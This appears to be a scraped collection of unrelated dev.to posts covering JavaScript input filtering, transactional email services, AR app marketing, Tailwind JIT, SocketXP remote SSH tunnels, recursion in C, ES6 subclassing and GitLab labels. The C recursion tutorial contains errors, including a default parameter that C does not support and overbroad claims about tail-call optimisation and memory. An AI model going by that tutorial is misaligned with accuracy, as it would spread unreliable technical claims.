Here we use a positive lookbehind `(?<= )` to tell our matcher to succeed only if it finds at least one dot `\..*` behind it. We combine it with the or operator `|` to the rest of our filters and get the final result.
Unfortunately this won't work in several major browsers, so for now I have a short function to handle it:
``` javascript
const formatNumber = (n: string) => {
// replace all non numeric, dots or dashes that aren't the first char
const filtered = n.replace(/(?!^)-|[^\d.-]/g, "");
// remove all but the first dot
const [first, ...others] = filtered.split(".");
const newValue = others.length
? [first, others.join("")].join(".")
: filtered;
return newValue;
};
```
## Final validation
The above function is perfect for validating a changing user input, but when it comes to validating the final value and converting it to a float, we need to do a small final check.
Running this filter over any string results almost always in a value that can be parsed correctly with `parseFloat`. The exceptions are resulting strings containing only `-`, `.` or `-.` which we can simply filter out and replace with zero. Or do a simple `NaN` check:
``` javascript
const getNumeric = (str: string) => {
const n = parseFloat(filterNumericInput(str));
return isNaN(n) ? 0 : n;
};
```
| ryandunn |
329,897 | Melhores serviços para enviar e-mails transacionais gratuitos | Quando você começa a desenvolver uma aplicação ou serviço web, provavelmente terá a necessidade de se... | 0 | 2020-05-14T19:54:50 | https://marquesfernandes.com/melhores-servicos-para-enviar-e-mails-transacionais-gratuitos/ | self, tech, email, emails | ---
title: Melhores serviços para enviar e-mails transacionais gratuitos
published: true
date: 2020-05-07 19:46:37 UTC
tags: Self,Tech,email,emails
canonical_url: https://marquesfernandes.com/melhores-servicos-para-enviar-e-mails-transacionais-gratuitos/
---
Quando você começa a desenvolver uma aplicação ou serviço web, provavelmente terá a necessidade de se comunicar através de e-mails com seus usuários. Você pode facilmente criar seu projeto piloto usando serviços de e-mail pessoal, enviando pelo protocolo SMTP usando serviços como Gmail, mas como o tempo e o aumento dos envios esses serviços podem trazer limitações como quantidade de envio e problemas com seus emails caindo no spam.
Então se sua aplicação está começando a enviar mais que uma centena de emails, provavelmente está na hora de procurar um serviço especializado nisso. Além de cuidar de todo o processo de envio, muitos dos serviços oferecem ferramentas mais avançadas pra controle de envio, monitoramento de entregas, aberturas e outras estatísticas muito úteis.
## O que é um email transacional?
[Emails transacionais](https://marquesfernandes.com/o-que-e-um-email-transacional/) são um tipo de e-mail automatizado entre o remetente e o recebedor. Diferente dos emails promocionais, um email transacional é disparado mediante eventos, interações com um serviço ou uma plataforma e não com uma empresa em si. São normalmente pré programados e disparados após uma interação, como, por exemplo, a criação de uma conta que requer verificação do email. Você pode entender um pouco melhor o uso desses emails lendo esse [post](https://marquesfernandes.com/o-que-e-um-email-transacional/).
## Melhores serviços de emails transacionais
Escolher um serviço que atenda sua demanda é muito importante, como essa funcionalidade faz parte do core de sua aplicação, é crucial que não haja empecilhos para usar e que alinhem com um custo e funcionalidades disponíveis em seu projeto.
1. [Amazon SES](#amazon-ses)
2. [SendGrid](#sendgrid)
3. [Mailgun](#mailgun)
4. [Mailjet](#mailjet)
5. [SendinBlue](#sendiblue)
## 1. [Amazon SES](https://aws.amazon.com/pt/ses/)
[](https://aws.amazon.com/pt/ses/)
A Amazon Web Services possui diversos serviços cloud, dentre eles o **Amazon SES** para envio de e-mails transacionais. Contando com toda a estrutura e confiabilidade da AWS, possui preços bem acessíveis. É uma solução robusta para quem possui uma certa experiência técnica, o serviço não oferece estatísticas por si, é preciso conectar com o outro serviço, o [AWS SNS](https://aws.amazon.com/pt/sns/), para conseguir acompanhar as métricas de seus envios.
**Plano gratuito:** 62 mil emails por mês.
## 2. [SendGrid](https://sendgrid.com/)
[](https://sendgrid.com/)
**SendGrid** é um dos serviços mais populares, possui mais de 80 mil usuários pagantes e enviam mais de 60 bilhões de e-mails por mês. Possui uma interface robusta para acompanhar, monitorar e analisar seus envios, bem como uma API muito bem documentada para integrar com sua aplicação.
**Plano gratuito:**
- 40 mil e-mails no primeiro mês e depois 100 e-mails por dia.
- APIs, SMTP Relay e Webhooks
- Editor de template de emails
- Estatísticas de envio
## 3. [Mailgun](https://www.mailgun.com/)
[](https://www.mailgun.com/)
**Mailgun** é uma solução completa para todo o escossistema de emails, desde envios até validações. Possui uma interface bem amigável, estatísticas completas e é uma ferramenta consolidada no mercado.
**Plano gratuito:**
Embora não seja uma solução 100% gratuita, oferece um plano de graça pelos primeiros 3 meses e depois um plano flex sob demanda.
- Email APIs, SMTP Relay e Webhooks
- Suppression Management
- Tracking e Estatísticas
- 99,99% Uptime SLA
## 4. [Mailjet](https://www.mailjet.com/)
[](https://www.mailjet.com/)
**Mailjet** é outro serviço consolidado no mercado, atendendo grandes empresas como a Microsoft e MIT. Sua plataforma é extremamente amigável, com estatísticas avançadas e APIs bem documentas para integrar com a sua aplicação.
**Plano gratuito:**
6 mil emails por mês / 200 emails por dia
- Contatos ilimitados
- APIs, SMTP Relay, Webhooks
- Editor de Template de Email
- Estatísticas Avançadas
## 5. [SendinBlue](https://pt.sendinblue.com/)
[](https://pt.sendinblue.com/)
**SendinBlue** é um serviço focado em marketing, possui uma plataforma extremamente amigável.
**Plano gratuito:**
300 emails por dia e contatos ilimitados
O post [Melhores serviços para enviar e-mails transacionais gratuitos](https://marquesfernandes.com/melhores-servicos-para-enviar-e-mails-transacionais-gratuitos/) apareceu primeiro em [Henrique Marques Fernandes](https://marquesfernandes.com). | shadowlik |
338,700 | Planning to develop an app like Snapchat? Here is all you need to know
| Snapchat is a popular and most admired augmented reality application. AR has seen a drastic growth si... | 0 | 2020-05-19T07:08:40 | https://dev.to/sheetalrawat18/planning-to-develop-an-app-like-snapchat-here-is-all-you-need-to-know-2lpe | hiresoftwaredeveloper, softwaredevelopmentcompany | <span style="font-weight: 400;">Snapchat is a popular and most admired augmented reality application. AR has seen a drastic growth since its first system development in the 1990s. It has been expected that by 2023, </span><a href="https://citrusbits.com/stats-and-facts-about-augmented-reality/"><span style="font-weight: 400;">AR market revenue</span></a><span style="font-weight: 400;"> will reach $61.39 billion USD</span><span style="font-weight: 400;">.</span>
<span style="font-weight: 400;">AR-enabled apps are capable of creating an interactive experience with physical elements. In a live view, </span><b>AR adds a few digital elements</b><span style="font-weight: 400;">. For example, the ability of the IKEA app to show how furniture will look at your place or Snapchat filters changing the way you look.</span>
<span style="font-weight: 400;">This is done with the help of the camera of a smartphone. The digital elements are added to the view that is captured by the camera lens. </span><b><i>Some popular AR apps like Snapchat are Pokemon Go, Google maps, IKEA, etc.</i></b>
<span style="font-weight: 400;">This technology has the capability to interact with users and make highly interactive apps. There are very few chances that an AR app will fail. If you are an entrepreneur and considering developing an app like Snapchat then it is a smart vision, I must say.</span>
<span style="font-weight: 400;">This is because when an app provides interactivity, it also generates revenue. Here are the </span><b>three queries which every entrepreneur who is planning to get an app as Snapchat raises.</b>
<i><span style="font-weight: 400;">How does an app like Snapchat works?</span></i>
<i><span style="font-weight: 400;">How does an app like Snapchat make money?</span></i>
<i><span style="font-weight: 400;">What are the top AR tools to develop an app like Snapchat?</span></i>
<b>Here are the answers to all these queries in detail.</b>
<h1><b>How does an app like Snapchat works?</b></h1>
<span style="font-weight: 400;">Snapchat is a multimedia app for messaging. It has 210 million daily active users. It is highly popular among the younger generation. It was launched in 2011 with limited features but since then there are a number of features added to the app. Here is a list of features of Snapchat that forms its core functionality:</span>
<b>Message exchange:</b>
<span style="font-weight: 400;">It is not like your regular messaging app. It has allowed its users to add multimedia messages called snaps.</span>
<b>Self-destructed messages:</b>
<span style="font-weight: 400;">This is the feature which is an important reason behind its popularity. As soon as the user views the message, it gets deleted. If the user does not view the snap, the server will delete it after 30 days.</span>
<b>Stickers:</b>
<span style="font-weight: 400;">Snapchat has 200 stickers and they have become an integral part of the app. You can design your own stickers too.</span>
<b>Geolocation:</b>
<span style="font-weight: 400;">You can share live location with your friends. The location will appear on the snap map.</span>
<b>Finding and adding friends:</b>
<span style="font-weight: 400;">To increase your social network, you can add friends on Snapchat. Apart from finding friends through phone numbers or user names, you can use some smart ways as well. These are Snapcodes are personalized QR codes that can be scanned to follow a user. Another option of Add nearby locations allows users to find users around their location.</span>
<b>Filter:</b>
<span style="font-weight: 400;">It is the most popular feature of this app which is based on two active shape models. The lens detects the face of the people by marking the face border. It aligns the facial borders with an image provided. This is done with the use of a machine learning algorithm. Moreover, there is a 3D mask which allows users to set accessories with their face.</span>
<b>Video and audio call:</b>
<span style="font-weight: 400;">You can connect over friends and family with just a tap on the video call button or audio call button.</span>
<b>Stories:</b>
<span style="font-weight: 400;">Like other popular apps like Whatsapp, Instagram, and Facebook, you can post stories that vanish in 24 stories. Users share images or videos via stories with their friends. Live stories were added later on where Snapchatters can share snaps on the same story while they are in the same event.</span>
<h1><b>How does an app like Snapchat make money?</b></h1>
<span style="font-weight: 400;">Every app has a goal to earn money and Snapchat earns a lot. Here are the channels for revenue generation:</span>
<b>In between snap ads:</b>
<span style="font-weight: 400;">A 10 seconds promotional video is shown to users in between snaps. Users can swipe up to read the blog or watch the full video.</span>
<b>Sponsored Lenses:</b>
<span style="font-weight: 400;">Businesses have the option to advertise through their customized lenses. They can target the location for their advertisement reach.</span>
<b>Sports partnership:</b>
<span style="font-weight: 400;">The apps develop a partnership with sports organizations to reach the audience and attract them to sports events.</span>
<b>In-app purchases:</b>
<span style="font-weight: 400;">There is an option to purchase additional features. For example, the option to replay a feed that the user has already seen.</span>
<h1><b>What are the top AR tools to develop an app like Snapchat?</b></h1>
<span style="font-weight: 400;">To develop an app, you are required to use some programming tools. There are some Software development kits which you can use to through <a href="https://www.pixelcrayons.com/technology-consulting-services?utm_source=dev_counsultant&utm_medium=rawat&utm_campaign=dev_counsultant">software consultant company</a> to develop an app like Snapchat:</span>
<h2><b>Vuforia:</b></h2>
<span style="font-weight: 400;">This tool has many exciting features with a free beta version. Some features are available with a watermark. The paid version has many features. It is compatible with many platforms like iOS, Windows platform, Android, etc. The data can be stored in a cloud or local storage. The USP of this tool is its usability for 2D and 3D with the use of Vuforia object scanner.</span>
<h2><b>Apple ARKit:</b></h2>
<span style="font-weight: 400;">It has gained immense popularity and one of the best tools for AR app development. But its use is restricted to iOS devices only. Its visual-inertial odometry (VIO) can be sued to track the environment with complete perfection. It can be aligned with features like Unreal and Unity to detect 2D objects. Its own face tracking feature is used to track 3D characters.</span>
<h2><b>Google ARCore:</b></h2>
<span style="font-weight: 400;">Like every other Google product, it also comes with perfection. It offers an advanced user interface and allows the AR app developers to create both Android and iOS apps. It is also compatible with Unity, Unreal, and Java/OpenGL.</span>
<h1><b>Conclusion:</b></h1>
<span style="font-weight: 400;">Reading about how an app like Snapchat works and how does it make money, it can be concluded that it is a great idea to get an app like Snapchat. You can reach an optimum level of user interactivity, earn revenues, and reach a wide audience with the help of these apps.</span>
<span style="font-weight: 400;">You can </span><a href="https://www.pixelcrayons.com/hire-app-developers?utm_source=dev_hireapp&utm_medium=rawat&utm_campaign=dev_hireapp"><span style="font-weight: 400;">hire app developers</span></a><span style="font-weight: 400;"> and share your custom requirements with <strong>software consultants' services</strong>. They will find which AR tool is best suitable for your application. I hope, after reading this article, you have chosen the features and AR SDK for your next AR app development project.</span>
| sheetalrawat18 |
670,024 | How to use the Tailwind JIT compiler | Recently, Tailwind v2.1 was released with the JIT compiler included. The JIT (Just In Time) compiler... | 0 | 2021-04-18T09:28:35 | https://www.jeroenvanrensen.nl/blog/tailwind-jit-compiler | tailwindcss | Recently, Tailwind v2.1 was released with the JIT compiler included. The JIT (Just In Time) compiler only generates CSS that you actually use, instead of all sorts of classes that you (almost) never use, like `subpixel-antialiased`, `place-self-start`, and `backdrop-brightness-95`. And even better compiling your CSS goes extremely fast, about 100ms.
If you don't know what Tailwind CSS is or how to use it, [read my post](https://www.jeroenvanrensen.nl/blog/tall-stack) about it.
## The Problem
The main problem with Tailwind CSS was the large development file size. In that file lots of classes are included, most of which you will never use. Because of this, not all spacing variants (like `mt-35`) are included. Moreover, if you want to use special variants like `group-focus` and `disabled` are not included by default.
When going into production, you had to run `npm run prod`, to purge all unused CSS classes. That means your deployment process takes more time, so users have to wait longer before they can use your website.
## The solution
The team behind Tailwind CSS has created the JIT compiler to solve this problem. Once you make a change in one of your files, your CSS gets recompiled with only the classes you actually use.
Compiling CSS has become lots faster. Whereas it used to take a few seconds, now it only takes 100ms, according to [the official announcement](https://blog.tailwindcss.com/just-in-time-the-next-generation-of-tailwind-css) even 3ms.
## How to use it
If you want to use the JIT compiler, follow these steps:
First, install Tailwind v2.1:
```
npm install -D tailwindcss@latest postcss@latest autoprefixer@latest
```
Next, add this to your `tailwind.config.js` file:
```js
// tailwind.config.js
module.exports = {
mode: 'jit',
purge: [
'./resources/**/*.blade.php'
],
//
}
```
Finally, run `npm run watch`, and keep it running.
## Benefits
Using the JIT compiler has more benefits:
- **Compiling CSS is fast**: whereas it used to take a few seconds to compile your CSS, now it gets done within a few milliseconds.
- **All variants are enabled**: you can use variants like `focus-group`, `active` and `disabled` without configuring anything to your configuration file.
- **Browsers perform better**: when you have a very large CSS file, browsers become slow. When using the JIT compiler, only used CSS will be generated, so inspecting HTML/CSS is quicker.
- **You don't have to worry about purging**: sometimes, when you are purging for production, some classes don't get purged, and your design breaks. When using the JIT compiler, purging is done when developing, so you have the same file. | jeroenvanrensen |
357,190 | Secure remote SSH access to your IoT devices & Raspberry Pi fleet using SocketXP. | In this article, we'll discuss how to use SocketXP IoT Remote SSH Access solution to SSH into your... | 0 | 2020-06-17T04:08:29 | https://dev.to/gvelrajan/secure-remote-ssh-access-to-your-iot-devices-raspberry-pi-fleet-using-socketxp-3aa4 | iotremotessh, iotconnectivity, managingraspberrypifleet, securetunnel | In this article, we'll discuss how to use [SocketXP IoT Remote SSH Access solution](https://www.socketxp.com/iot/remote-access-iot-ssh-over-the-internet/) to SSH into your IoT or Raspberry Pi fleet.
<h2>What is SocketXP</h2>
[SocketXP](https://www.socketxp.com) is a <code>cloud based [secure SSL/TLS reverse tunnelling service](https://www.socketxp.com/iot/create-secure-reverse-ssh-tunnel-to-raspberry-pi/)</code>that provides remote SSH access to your IoT devices.
SocketXP solution does not require any changes to your firewall or gateway router configuration. SocketXP creates a [secure SSL/TLS reverse tunnel through your firewall and NAT and over the internet](https://www.socketxp.com/iot/create-secure-reverse-ssh-tunnel-to-raspberry-pi/) to your IoT devices for remote SSH access.
SocketXP is a cloud based massively scalable IoT Gateway solution that can provide connectivity to more than 10,000 IoT devices for a single user account.
<code>SocketXP solution is trusted by thousands of end users including small and medium size enterprises, business owners, developers and Raspberry Pi geeks and DIY kind of folks.</code>
<h2>How SocketXP IoT Remote SSH solution works</h2>
Install a simple, secure and lightweight SocketXP IoT agent on your IoT device (or Rasperry Pi). The SocketXP agent will securely connect (using a SSL/TLS tunnel) to the SocketXP IoT Cloud Gateway using an authentication token. You could then SSH into your device from the comfort of your browser by visiting our SocketXP IoT Cloud Gateway Portal.

<h3>Step 1: Download and Install</h3>
Download and install the SocketXP IoT agent on your IoT device or Raspberry Pi device from <a href="https://www.socketxp.com/download/>here</a>
<h3>Step 2: Get your Authentication Token</h3>
Sign up at https://portal.socketxp.com and get your <code>authentication token</code>.

Use the following command to login to the SocketXP IoT Cloud Gateway using the auth token.
<pre>
$ socketxp login [your-auth-token-here]
</pre>
<h3>Step 3: Create SocketXP SSL Tunnel Endpoint for Remote SSH</h3>
Use the following command to create a secure and private SSL tunnel endpoint at the SocketXP IoT Cloud Gateway.
<pre>$ socketxp connect tcp://localhost:22
TCP tunnel [test-user-gmail-com-34445] created.
Access the tunnel using SocketXP agent in IoT Slave Mode
</pre>
SocketXP doesn't create any public TCP tunnel endpoints that can be connected to by any SSH client on the internet.
SocketXP private tunnel endpoints are not exposed to the internet and can be accessed only using the SocketXP agent (using the auth token of the user) or through the XTERM terminal in the SocketXP Portal page using a web browser.
Follow the steps below to access your IoT or RPi device from the comfort of your browser. We have used XTERM to connect to your IoT devices from our portal page via a browser from any device - laptop/desktop/tablet/phone - Android/IOS anything works.



<h3>SocketXP Single-Touch Installation Option:</h3>
The 3 step instruction explained above to setup SocketXP on your IoT device is a tedious process, if you got thousands of RPi to install, configure and manage.
With this mind, SocketXP IoT Solution also provides a single-touch installation for installing and configuring SocketXP IoT Agent on large number IoT or RPi devices.
Copy paste the below single command into the terminal of your IoT devices and it will install/configure/setup and bring up the devices online in our SocketXP portal.

<h3>Configuring SocketXP agent to run in slave mode</h3>
First download and install the regular SocketXP agent software on your accessing device (such as a laptop running Windows or Mac OS). Next, configure the agent to run in slave mode using the command option <code>--iot-slave</code> as shown in the example below. Also, specify the ID of the IoT device you want to connect to, using the <code>--iot-device-id</code> option.
<pre>
$ socketxp connect tcp://localhost:3000 --iot-slave --iot-device-id "DEV0000000123"
Listening for TCP connections at:
Local URL -> tcp://localhost:3000
Accessing the IoT device from your laptop
</pre>
Now you can access your IoT device’s SSH server using the above SocketXP local endpoint, instead of a public endpoint, as shown below.
<pre>
$ ssh -i ~/.ssh/john-private.key john@localhost -p 3000
We recommend using SocketXP Private TCP Tunnels for all your remote IoT device access needs. Public TCP tunnels can be used for hobby usecase, quick testing or one-off accesses.
</pre>
<br><br>
<h2>SocketXP Scaling and Performance</h2>
SocketXP IoT Gateway easily supports more than 10K device per customer account. SocketXP IoT Gateway also has the built-in capability to grow on demand, as it is a cloud based SaaS service.

<br>
<h2>Conclusion:</h2>
The solution discussed in this article is a secure method to remote SSH into your home or office computer because the data is encrypted using SSL.
SSH uses the same cryptography technology used by banks and governments to exchange highly confidential data over the internet.
The data transferred gets encrypted end-to-end between the SSH client and the SSH server.
SocketXP has no way to decrypt or eavesdrop your encrypted data without knowing your SSH private keys. SocketXP merely acts as an online [reverse proxy server](https://www.socketxp.com/iot/create-secure-reverse-ssh-tunnel-to-raspberry-pi/) for your encrypted data traffic transmitted through the SSH connection.
<b>This article was originally published at: <a href="https://www.socketxp.com/iot/remote-access-iot-ssh-over-the-internet/">SocketXP IoT Remote SSH Access Raspberry Pi Remote Control</a></b> | gvelrajan |
358,103 | Understanding recursions and memory | Recursion is a very well-known concept in modern high-level programming languages. In this post, we w... | 0 | 2020-06-18T15:58:22 | https://dev.to/therise3107/understanding-recursions-and-memory-4eph | recursion, c, memory | Recursion is a very well-known concept in modern high-level programming languages. In this post, we will try to analyze the recursion in C language. I am pretty sure learning in C should be sufficient to understand this topic's implementation in other languages as well. Well, that's being said recursion are language agnostics just like loops but there is one catch; language should have some support for recursion optimization via tail recursion. In present time, every language has it.
Just to give a quick refresher, recursion or recursive function is the function that returns itself with new computed parameters. The incoming parameters determine the condition for the next call; if the terminating condition is met then, it will return some value else the cycle continues.
A recursive function has one terminating condition and, two phases: winding and unwinding. Let's understand this by a simple expression
```C
// Calculates sum of digits
int recursive_sum(int num) {
if (num == 1) {
return num;
} else {
return num + recursive_sum(num - 1);
}
}
Which is simply doing something like this:
F(5) = 5 + F(4); winding start
4 + F(3);
3 + F(2);
2 + F(1); winding end
1; terminating condition return
2 + 1; unwinding start
3 + 3;
4 + 6;
F(5) = 5 + 10; unwinding end
```
or in simple terms: F(x) -> F'(F''(x''));
Recursion can be subdivided into two parts:
1. Basic/traditional recursion
2. Tail recursion
A basic recursion is a recursion that has both winding and unwinding phase and tail recursion just has a winding phase. To fully comprehend the recursion we will be looking into how memory is utilized in a C program.
Whenever we start the execution of our program, memory is allocated for computations. The program can be divided into segments like variables, loops, constants, globals, functions, instructions so on and forth. The memory semantics are different for each segment. Our compiler utilizes the different regions of memory to execute the program, the regions are:
1. Code area
2. Static data area
3. Stack
4. Heap
*Code area* contains the instructions which your program executes as it advances.
*Static data area* stores the data that is declared by the program for the duration of its life cycle. Global variables, constants (Read-only) reside here along with the variables which can be modified during runtime.
**Stack** region is similar to the Stack data structure; it follows the LIFO, last in fast out principle. The stack stores the information about function call for the duration of its execution. Whenever we call a function, our compiler allocates some storage in the stack in a region called activation record or simply a stack frame. In simple terms Stack is an array where each block is a stack frame that stores some information about the function. The top frame is called a Stack pointer which will be updated to refer the most recent activation call.
The stack frame can be further divided into five separate regions to store different information about an activation call.
1. Incoming parameters
2. Return value
3. Temporary storage
4. Saved state information
5. Outgoing parameters
Incoming parameters are the parameters provided in the activation call. Outgoing parameters are the parameters that are passed onto the next call to function(next activation call). Temporary storage stores the data used during the execution. Saved state information is the saved information for reference when the activation terminates. The return value is simply the return of a function.
**Heap** or dynamic memory is the memory allocated at the runtime. When we cannot pre-allocate storage for our program, we may generally request, reserve, and free the memory as per our need. Malloc, calloc, realloc for memory allocation, and free to deallocate are used in C but most other programming languages do it by default by using something called ARC (Automatic reference control if ARC is 0 for some object then the memory gets freed).
In C memory leaks happen if we forget to call free and in other languages like Swift memory leak will happen if a Node is self-referencing i.e class referring to self, in that case, ARC will always be 1 even when the Class doesn't have any member. There are options of ways to solve this in the respective languages but they are beyond the scope of our main topic. There are memory leaks at stack level as well which we will be looking next, like how recursions could lead to stack overflow.
Copy by reference is generally dynamic memory while copy by value is static, or Class members(not in C) are stored in the heap and struct members in the stack. Accessing heap is costly than accessing stack so a little optimization trick is to use a struct.
**Coming back to recursion**, each function call in our recursive function is going to be stored in our stack frame along with the information associated with it. Now, let's look into a simple recursive code:
```C
int recursive_sum(int num) {
if (num == 1) {
return num;
} else {
return num + recursive_sum(num - 1);
}
}
int t_recursive_sum(int num, int sum = 0) {
if (num == 0) {
return sum;
} else {
return t_recursive_sum(num - 1, sum + num);
}
}
int main() {
printf("Basic: %d\n", recursive_sum(5));
printf("Tail: %d\n", t_recursive_sum(5));
return 0;
}
```
`recursive_sum` and `t_recursive_sum` both return the same value, essentially they are doing the same thing but what we abstracted is how they are doing it.
Let's say F(x) is recurive_sum(5);
```C
F(5) -> 5 + (F(4) -> 4 + (F(3) -> 3 + (F(2) -> 2 + (F(1) -> 1))))
F(5) = 5 + F(4); // winding start
4 + F(3);
3 + F(2);
2 + F(1); // winding end
1; // terminating condition
2 + 1; // unwinding start
3 + 3;
4 + 6;
F(5) = 5 + 10; // unwiding end
```
F'(x) is t_recursive_function(5);
```C
F'(5, 0) -> F(4, 5) -> F(3, 9) -> F(2, 12) -> F(1, 14) -> F(0, 15)
F(5, 0) = F(4, 5); // winding start
F(3, 9);
F(2, 12);
F(1, 14);
F(0, 15);
15; // final return
no unwinding
```
Both F(x) and F'(x) are doing winding but F(x) is also doing unwinding. This means if there were n call till the first actual return (notice how many parentheses our F(5) has) then there will be n more returns before F(x) finally finishes the execution.
Since F(5) is doing some computations on each return so the stack frames which were used when we returned F(4)…F(1) are never freed this means if there were n calls then there are n stack frames still holding all the information about function variables and state. This means our stack will grow in size but what if it just cannot grow more? Well it will throw an error famously knows as *Stack Overflow*.
So our basic recursion is not only slow but dangerous as well. Tail recursion just returns the function itself and it finishes its execution (the function memory is freed as soon as it returns). To make it more clear think it like this in basic recursion the function never gets freed since it is doing something like this constant + F'(x) so in this case, the last function or stack frame gets freed first.
In our tail recursion, our stack pointer never updated to the next stack that is because as soon as the function returns, the memory used by it will be freed. It doesn't matter if it returns the next function, the point is next call will be independent of its parent as soon as it is called so we do not need to hold the memory. So we can just rewrite on the previous stack. This means more optimizations and no overflow :).
In conclusion, recursions can be avoided by using iteration but if you are using them then try to use tail recursion. You can practice on recursion if you look into greedy algorithms or divide and conquer(does binary search ring a bell?). If you want to see recursion more interactively you can check [Algorithm Visualizations](https://www.cs.usfca.edu/~galles/visualization/RecFact.html) and how basic recursion is significantly improved by using iteration and memorization in the case of Fibonacci numbers.
Thanks for reading the post, please note this is by no means a deep dive into the memory topic but just an introduction. My goal was to understand how recursions and memory work for code optimization and how recursion is analogical with iterations, so I wrote this one to share whatever less I know. Have a good day :) | therise3107 |
383,465 | Inheritance and SubClasses Using ES6 | Javascript Inheritance and SubClasses In Javascript there are many different patterns to f... | 0 | 2020-07-06T04:00:05 | https://dev.to/cschratz/inheritance-and-subclasses-using-es6-3ncl | javascript, beginners, subclasses, es6 | ## Javascript Inheritance and SubClasses
In Javascript there are many different patterns to follow when going about object instantiation. Each of these patterns: functional, functional-shared, prototypal and pseudoclassical, follow specific syntax guidelines and the pattern one chooses impacts how object inheritance is handled. If you're unsure of how instantiation patterns work, [here](https://dev.to/mconner89/a-quick-guide-to-instantiation-in-javascript-6n) is a great article covering the topic. When EMCAScript 2015 or ES6 was released, they introduced the ability to create subclasses using the keywords extend and super, both of which, will be discussed later. When an object is a subclass of another object, it inherits the methods and properties of the 'parent' object and has access to those. Now let's discuss how pseudoclassical instantiation, subclassing and object inheritance works with ES6!

## The class Keyword
When using ES6 instantiation the keyword 'class' is used to denote a new instance of an object and its constructor. Since we're using ES6 we can create object methods right within the class function, using less code and creating a more readable object. Below is the format that the ES6 pseudoclassical instantiation follows. Note the use of the 'class' keyword at the start of the function.
```javascript
class Animal {
constructor(name, favFood) {
this.name = name;
this.food = favFood;
}
identifier() {
return `I am ${this.name}`;
}
}
```
Now that we have our 'parent' class, we can start creating subclasses based off of the parent object. In order to create a subclass we need to use the keyword 'extends', which allows us to copy the parent class into the new subclass that's being created. This is where our new class will be inheriting everything from the parent class! While extends does most of the heavy lifting, there's still a bit of work that needs to be done on our end. While the methods will be copied with extends, we will still have to create the constructor function within the new class being created. Below you'll see the structure of our subclass using the extends keyword and creating the constructor function within.
```javascript
class Dog extends Animal {
constructor() {
// What Goes In Here?
};
}
```
##The super Keyword
Now our new subclass is looking pretty good, but what do we do with the constructor function within it? We'll be invoking the super keyword, which references the parent class's constructor function. This allows us to recreate the same properties from the parent class in the subclass. Let's take a look at how that works down below.
```javascript
class Dog extends Animal {
constructor(name, favFood, sound) {
// passing the parameters of the parent class
// plus the parameter sound
super(name, favFood);
this.sound = sound;
}
}
```
Now that we've successfully created our subclass from the parent class, let's look at how we can add methods to the subclass as well as overwrite previous methods inherited from the parent class, while maintaining those within the parent class. This is one of the great uses of subclasses within Javascript!
```javascript
class Dog extends Animal {
constructor(name, favFood, sound) {
super(name, favFood);
this.sound = sound;
}
makeNoise() {
// Adds a makeNoise method to our dog class!
return `${this.sound} ${this.sound}`;
}
}
// Creating a subclass called Cat from our Dog subclass
class Cat extends Dog {
constructor(name, favFood, sound, action) {
super(name, favFood, sound);
this.action = action;
}
makeNoise() {
// Overwriting the makeNoise function for the Cat subclass
return `Meow!`
}
catThing() {
// Adding a new catThing class that returns this.action
// as a string
return `${this.action}`;
}
}
```
Look at all we've done so far! We have an Animal class that is the parent class, a Dog class that is a subclass of the Animal class, and a Cat class that is a subclass of the Dog class. Let's look at how each of these subclasses operate and inherit the methods and properties of their parent class!
```javascript
const bat = new Animal('Dracula', 'blood');
console.log(bat.name); // Prints 'Dracula' to the console
const doggie = new Dog('Spot', 'bones', 'bark');
doggie.identifier(); // returns 'I am Spot' // We still have the
// identifier method in our Dog subclass!
doggie.makeNoise(); // Returns 'bark bark'
// Our makeNoise function in our Dog subclass
// still works as intended even though we
// overwrote it within the Cat subclass!
const kitty = new Cat('Sabrina', 'fish', 'meow', 'purrr');
kitty.makeNoise(); // Returns 'Meow!'
kitty.catThing(); // Return 'purrr'
```
As you can see in the code lines above as we create new subclasses from a parent class, each subclass inherits what the parent class has and then whatever methods or properties that you designate within the constructor function. Using the ES6 pattern for creating subclasses is a great option for a programmer, and I highly recommend getting comfortable with the syntax and process because it is very useful.
##Conclusion
We've covered the process on creating classes and subclasses within Javascript using ES6. As you've seen this method of class creation allows you to easily copy properties and methods over from a parent class using the extends and super keywords. This method is extremely useful and allows you the freedom to modify subclasses of the parent depending on how you want them to operate. Using the ES6 syntax for creating subclasses saves lines of code and thus memory, which are both great benefits. ES6 is supported by all current browsers and using it while creating classes and subclasses is a great tool in your programmer's toolbox, so get out there and start putting it to use in your code!
P.S. Don't forget to use the 'new' keyword when creating new instances of your class and subclasses!
| cschratz |
397,081 | Quick tips to enhance your gitlab issue workflow, part one | This post is originally posted on i-Logs blog and in my Collected Notes. When Emmanuel Bergmans and... | 0 | 2020-07-14T11:52:24 | https://dev.to/gwelr/quick-tips-to-enhance-your-gitlab-issue-workflow-part-one-1o2o | gitlab, workflow, beginners, methodology | <small>*This post is originally posted on [i-Logs blog](https://i-logs.com/blog/quick-tips-to-enhance-your-gitlab-issue-workflow-part-one/) and in my [Collected Notes](https://collectednotes.com/gwelr/quick-tips-to-enhance-your-gitlab-issue-workflow-part-one)*.</small>
When [Emmanuel Bergmans](https://www.linkedin.com/in/ilogs) and myself started i-Logs back in 2009, we were using a simple workflow based on [Subversion](https://subversion.apache.org/) (now Apache Subversion) and [Mantis](https://www.mantisbt.org). In 2016, we moved all our projects from subversion to git, the new kid on the block. At the same time, we adopted [Gitlab CE](https://gitlab.com/gitlab-org/gitlab-ce/) as our end-to-end software development platform. We use Gitlab for version control, source hosting, issue tracking, code review and continuous integration. That was the main reason we adopted Gitlab (and git) over subversion: it provides us with an integrated tool for managing sources and all the development activities in one single place. How convenient is that ?
The purpose of this post is to introduce quick tips we have adopted to customized the [Gitlab CE issue tracker](https://docs.gitlab.com/ce/user/project/issues/) to our needs. Initially, this article is written for our clients as a kind of public documentation of our internal processes but we sincerely hope you'll find something useful if you are also using Gitlab. We are currently using Gitlab 12, so all the tips presented in this post refer to features available in that version.
We assume you have an access to a gitlab instance and you have at least a minimal knowledge of the features provided.
In this post, you will cover the following topics:
* how to define and use label categories
* how to define and use group labels
* how to define and use star labels
This post is the first instalment of a series of two. In a later post, we will cover how we are dealing with the issue board which is an important part of our daily workflow.
A side note: Gitlab uses the *Issue* metaphor but we, at i-logs, usually talk about change requests. We believe that the word "issue" has a negative connotation and that not every change request is, well, an issue per se. Through this document, we will preferably use the term change request although in Gitlab, it is called an issue.
## Categorize labels
For one of our client, we have an average of 300 open change requests distributed on four different projects. Using label categories help us sorting these change requests more efficiently. We have identified the following categories: priority, pile, type, environment and velocity. To illustrate our point, we will focus on the first three.
